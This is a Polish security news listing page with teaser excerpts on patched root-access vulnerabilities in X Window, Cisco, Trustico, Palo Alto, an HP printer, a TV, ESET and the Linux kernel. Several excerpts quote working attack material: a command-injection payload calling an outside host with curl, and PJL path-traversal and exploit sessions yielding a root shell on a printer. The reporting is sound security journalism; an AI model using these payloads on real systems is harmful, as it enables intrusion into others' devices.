No dobra, czym prędzej wyjaśniamy o co w tym gorącym tytule dokładnie chodzi. Banalnie prosta do wykorzystania podatność została właśnie załatana w X Window. Jeśli ktoś nie używa tego systemu, może spać spokojnie. Spokojnie mogą też spać ci, którzy nie mają ustawionego bitu suid na binarce xorg. Ale… nawet na…
Czytaj dalej »Pewnie część z Was kojarzy PC Speakera – to taki wprowadzony dawno temu w PC-tach głośniczek: Pod Linuksy jest binarka, która umożliwia odgrywanie konkretnego dźwięku na PC speakerze. Jak tłumaczą developerzy Debiana: Program beep robi to czego można się po nim spodziewać: brzęczy. Jak się jednak okazuje, nie tylko „brzęczy” –…
Czytaj dalej »Cisco załatało niedawno co najmniej dwa krytyczne błędy, jeden z nich to zahardcowane hasło na ssh w: Cisco Prime Collaboration Provisioning. Wprawdzie nie daje ono roota, ale istnieje też możliwość podniesienia uprawnień. Drugi problem to już bezpośrednia możliwość dostępu na roota (przecież web serwer musi pracować z uprawnieniami root, prawda? :)…
Czytaj dalej »Chodzi o Trustico, który dostarczał certyfikaty SSL m.in. „pechowemu” Equifax. Jak wyglądał exploit dający roota? Banalnie – w miejscu gdzie sprawdzaliśmy domenę wystarczyło wpisać: $(curl https://domain/`id`) Efekt? Porażający, bo poza wykonaniem kodu, widać że wykonuje się on jako root: 35.190.140.214 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0" Nasi czytelnicy raczej się nie nabiorą nigdy na hasło Trustico (i…
Czytaj dalej »Z jailbreakami na iOS w wersji 11 jest ciężko, co wpisuje się w ogólny trend: w ostatnim czasie jest mało jailbreaków na iOS (również na wersję 10). A tymczasem dostaliśmy kod źródłowy jailbreaka na iOS – na wersję 11.1.2. Więcej – tutaj mamy dokładny, techniczny opis jailbreaka, również z instrukcją dla…
Czytaj dalej »O samym eksploicie było wiadomo już jakiś czas temu, a teraz mamy niemal pełne szczegóły – udostępniono po prostu kod źródłowy całości – czyli stronę HTML, która jak reklamują autorzy explota daje „JailbreakMe PS4 4.05 (FULL JAILBREAK)”. Wystarczy wejść przeglądarką z PS-a na taką stronę i mamy już pełen, nieskrępowany…
Czytaj dalej »Właśnie załatano podatność umożliwiającą wykonanie kodu jako root przez panel administracyjny firewalli Palo Alto (PAN-OS <= 6.1.18 , PAN-OS <=7.0.18, PAN-OS <=7.1.13 , PAN-OS <=8.0.6). Niepokojący jest na pewno fakt, że załatanie tej luki zajęło około 5 miesięcy, szczególnie że eksploit nie jest specjalnie skomplikowany i wymaga wysłania raptem kilku…
Czytaj dalej »
Może Alexa sama nie udostępni ssh z rootshellem, ale mamy ładny opis jak można zrootować sobie Amazon Echo:
Czytaj dalej »Google właśnie wypuścił lipcowy Android Security Bulletin, gdzie wśród całej hordy błędów oznaczonych jako RCE/Critical, jest też CVE-2017-9417 w sterownikach Wi-Fi Broadcoma. Jeśli sam Google nadaje taką flagę dla buga w swoim produkcie, raczej nie może być drobnostka. Pamiętacie podobną historię sprzed paru miesięcy? Wygląda to na podobny i wg autora…
Czytaj dalej »Dość dokładny opis rootowania drukarki HP OfficeJet Pro 8210. Rozmowa odbywała się protokołem PJL. Od zwykłego odpytania o nazwę drukarki:
|
1 2 3 4 |
albinolobster@ubuntu:~$ nc 192.168.1.159 9100 @PJL INFO ID @PJL INFO ID "HP OfficeJet Pro 8210" |
przez Path Traversal:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
@PJL FSUPLOAD NAME="../../etc/passwd" OFFSET=0 SIZE=648 @PJL FSUPLOAD FORMAT:BINARY NAME="../../etc/passwd" OFFSET=0 SIZE=648 root:x:0:0:root:/var/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh operator:x:37:37:Operator:/var:/bin/sh haldaemon:x:68:68:hald:/:/bin/sh dbus:x:81:81:dbus:/var/run/dbus:/bin/sh ftp:x:83:83:ftp:/home/ftp:/bin/sh nobody:x:99:99:nobody:/home:/bin/sh sshd:x:103:99:Operator:/var:/bin/sh default:x:1000:1000:Default non-root user:/home/default:/bin/sh _ntp:x:100:99:Linux User,,,:/run/ntp:/bin/false |
aż po nieudane próby, zakończone w kilku iteracjach sukcesem (tak, poniższy skrypt w pythonie też jest dostępny w cytowanym artykule).
|
1 2 3 4 5 6 7 |
albinolobster@ubuntu:~$ python printer_exploit.py 192.168.1.158 9100 connecting to 192.168.1.158 port 9100 @PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh" TYPE=FILE SIZE=119 Done! Try port 1270 in ~30 seconds albinolobster@ubuntu:~$ nc 192.168.1.158 1270 whoami root |
Dla tych którzy chcą mieć…
Czytaj dalej »Nie ma to jak rozłożyć się wygodnie na kanapie, wyciągnąć pilota i zdobyć na telewizorze roota. Tutaj wystarczył odpowiednio nazwać swój sprzęt – niewinną nazwą sleep 5. Jak widzicie wszystko z wykorzystaniem zwykłego pilota: Telewizor przestał odpowiadać na chwilę – mamy więc OS exec. Co dalej? Okazuje się że na…
Czytaj dalej »Od przejmowania sesji administratora po wykonanie kodu, za pomocą generowania odpowiednio spreparowanych pakietów UDP. Podatna jest usługa networkmap, odpowiedzialna za mapowanie (czy bardziej precyzyjnie – sprawdzanie pewnych funkcji czy usług), nowych komputerów w LAN: networkmap is responsible for generating a map of computers connected to the router. It continuously monitors…
Czytaj dalej »Jeśli ktoś używa tego produktu, warto się zaktualizować. Pokazał się dość szczegółowy odpis podatności, dającej dostęp na root na komputerze ofiary. ESET Endpoint Antivirus 6, zlinkowany był statycznie z podatną biblioteką z 2013 roku (do parsowania XML-i), a ta z kolei bazuje na podatnym expacie z 2007 roku(!). Na deser małe pocieszenie…
Czytaj dalej »Historia podobna jak w Dirty Cow: CVE-2017-6074 is a double-free vulnerability I found in the Linux kernel. It can be exploited to gain kernel code execution from an unprivileged processes. Podatność występuje w module do obsługi protokołu DCCP. Szybka metoda sprawdzenia czy mamy w jądrze wkompilowany ten moduł: zgrep CONFIG_IP_DCCP /proc/config.gz Jeśli nie mamy…
Czytaj dalej »Powodem jest /bin/ntfs-3g który posiada bit suid (właściciel root). Jeśli nasz linux nie obsługuje FUSE, ntfs-3g uruchamia modprobe i próbuje dorzucić do jądra odpowiedni moduł. Problem w tym, że modprobe nie bardzo powinien być używany wewnątrz suidowanej binarki, czytamy bowiem: The MODPROBE_OPTIONS environment variable can also be used to pass arguments…
Czytaj dalej »